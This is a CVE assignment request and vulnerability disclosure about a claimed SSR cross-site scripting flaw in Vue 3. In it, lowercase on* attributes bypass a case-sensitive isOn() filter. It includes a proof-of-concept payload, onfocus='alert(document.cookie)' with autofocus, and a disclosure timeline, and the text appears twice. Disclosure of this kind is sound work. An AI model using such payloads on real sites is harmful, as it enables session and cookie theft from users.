CVE Request — Vendor Unresponsive
I am requesting GitHub CNA to assign a CVE ID for a high-severity vulnerability in Vue.js. The vendor has not responded after 10 days. This is a separate vulnerability from the RCE reported in #7299.
Existing Advisory
- GHSA: GHSA-5w45-w79q-rpqq (submitted 2026-03-31, still in triage)
- MITRE: Ticket #2013988 (submitted 2026-03-25) + CVE Form (submitted 2026-04-03)
- Vendor: security@vuejs.org — notified 2026-03-25, zero response
Vulnerability Summary
| Field |
Value |
| Product |
Vue.js (vuejs/core) — @vue/shared, @vue/server-renderer |
| Versions |
All Vue 3.x through 3.5.30 (latest) |
| CWE |
CWE-79 (Improper Neutralization of Input During Web Page Generation) |
| CVSS |
7.2 High (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) |
| Type |
SSR Cross-Site Scripting — Regression of CVE-2018-6341 |
Root Cause
The isOn() function in packages/shared/src/general.ts:15 uses a case-sensitive check that only filters event attributes starting with on followed by an uppercase letter (e.g., onClick). However, HTML event attributes are case-insensitive, so onclick, ONCLICK, oNcLiCk all bypass the filter and render in SSR HTML output.
// isOn() only matches "on" + uppercase third character
export const isOn = (key) =>
key.charCodeAt(0) === 111 && // 'o'
key.charCodeAt(1) === 110 && // 'n'
(key.charCodeAt(2) > 122 || key.charCodeAt(2) < 97) // uppercase only!
onClick → filtered ✓onclick → bypasses filter ✗ (browser still executes)ONCLICK → bypasses filter ✗
Proof of Concept
import { createSSRApp } from 'vue'
import { renderToString } from 'vue/server-renderer'
const app = createSSRApp({
template: '<input v-bind="$attrs" />',
inheritAttrs: true
})
const html = await renderToString(app, {
attrs: { autofocus: '', onfocus: 'alert(document.cookie)' }
})
// Output: <input autofocus onfocus="alert(document.cookie)">
// Zero-interaction XSS — autofocus triggers onfocus automatically21 out of 21 DOM event handler attributes render in SSR output when using lowercase on* names.
Prior Art
- CVE-2018-6341 (Vue 2.x SSR v-bind XSS): The same class of vulnerability in Vue 2, fixed in v2.5.17. Vue 3's fix is incomplete — it only blocks camelCase event attributes, not lowercase/uppercase variants.
Disclosure Timeline
| Date |
Action |
| 2026-03-25 |
Reported to security@vuejs.org |
| 2026-03-25 |
MITRE ticket #2013988 submitted |
| 2026-03-31 |
GitHub PVR GHSA-5w45-w79q-rpqq submitted |
| 2026-04-03 |
MITRE CVE Form submitted |
| 2026-04-04 |
This GitHub CNA request |
| 2026-06-23 |
90-day public disclosure deadline |
Request
Please assign a CVE ID for this vulnerability. This is a distinct vulnerability (XSS, different root cause and CWE) from the RCE reported in #7299. The vendor has been completely unresponsive across all channels.
CVE Request — Vendor Unresponsive
I am requesting GitHub CNA to assign a CVE ID for a high-severity vulnerability in Vue.js. The vendor has not responded after 10 days. This is a separate vulnerability from the RCE reported in #7299.
Existing Advisory
Vulnerability Summary
Root Cause
The
isOn()function inpackages/shared/src/general.ts:15uses a case-sensitive check that only filters event attributes starting withonfollowed by an uppercase letter (e.g.,onClick). However, HTML event attributes are case-insensitive, soonclick,ONCLICK,oNcLiCkall bypass the filter and render in SSR HTML output.onClick→ filtered ✓onclick→ bypasses filter ✗ (browser still executes)ONCLICK→ bypasses filter ✗Proof of Concept
21 out of 21 DOM event handler attributes render in SSR output when using lowercase
on*names.Prior Art
Disclosure Timeline
Request
Please assign a CVE ID for this vulnerability. This is a distinct vulnerability (XSS, different root cause and CWE) from the RCE reported in #7299. The vendor has been completely unresponsive across all channels.